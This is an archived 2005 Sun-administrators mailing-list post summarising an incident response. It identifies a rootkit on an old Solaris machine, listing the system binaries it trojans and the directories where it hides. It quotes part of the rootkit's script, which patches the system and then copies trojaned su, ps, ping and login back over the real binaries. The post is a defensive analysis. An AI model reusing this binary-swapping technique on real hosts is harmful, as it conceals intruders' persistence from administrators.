From: Rami Aubourg-Kaires (rami.aubourg@ifrance.com)
Date: Fri Feb 04 2005 - 06:02:33 EST
Hello, list, and thanks to everyone who reponded, particularly:
Neil Quiogue
"the hatter"
Dik Casper
Chris Keladis
Michael Palamara
Calin Siulea
Christer Eriksson
David Foster
Meder Kydyraliev
Basically, it's the X-Org SunOS rootkit from Sept 2001, which replaces,
among other things:
/usr/bin/login, which causes the impossibility to login through telnet,
su,
ps,
ping,
find,
(maybe netstat and ls, too)
It installs into /usr/lib/libX.a and /dev/pts/01.
The directories might not be visible, since ls could be trojaned. cd'ing
is possible, though.
Extract from the "fixer" script of the rootkit
***************
cp /usr/bin/su /dev/pts/01/55su
cp /usr/bin/ps /dev/pts/01/55ps
cp /usr/sbin/ping /dev/pts/01/55ping
cp /usr/bin/login /dev/pts/01/55login
/usr/bin/wget
ftp://sunsolve.sun.com/pub/patches/2.7_Recommended.tar.Z >/dev/null
uncompress 2.7_Recommended.tar.Z
tar -xf 2.7_Recommended.tar
cd 2.7_Recommended
echo y|./install_cluster -nosave -q
cd /tmp
rm -rf 2.7_Recommended.tar 2.7_Recommended
cp -f /usr/bin/su /dev/pts/01/bin/su
cp -f /dev/pts/01/55su /usr/bin/su
cp -f /usr/bin/ps /dev/pts/01/bin/psr
cp -f /dev/pts/01/55ps /usr/bin/ps
cp -f /usr/sbin/ping /dev/pts/01/bin/ping
cp -f /dev/pts/01/55ping /usr/sbin/ping
mv -f /usr/bin/login /sbin/xlogin
cp -f /dev/pts/01/55login /usr/bin/login
***********************
The initial exploit channel is difficult to check, since it could
exploit a flaw in snmpXdmid according to CERT.
Problem was: Old system, old Solaris, old 3rd party binaries, too few
patches. With a 3-year old patch, the system should have been safe. It
is off public network and will be reinstalled anyhow, as it's the only
really safe solution
The abuse report has been sent to the netblock owner of the server
hosting the rootkit.
Rami
Rami
_____________________________________________________________________
Envie de discuter gratuitement avec vos amis ?
Tilichargez Yahoo! Messenger http://yahoo.ifrance.com
_______________________________________________
sunmanagers mailing list
sunmanagers@sunmanagers.org
http://www.sunmanagers.org/mailman/listinfo/sunmanagers
This archive was generated by hypermail 2.1.7 : Wed Apr 09 2008 - 23:30:07 EDT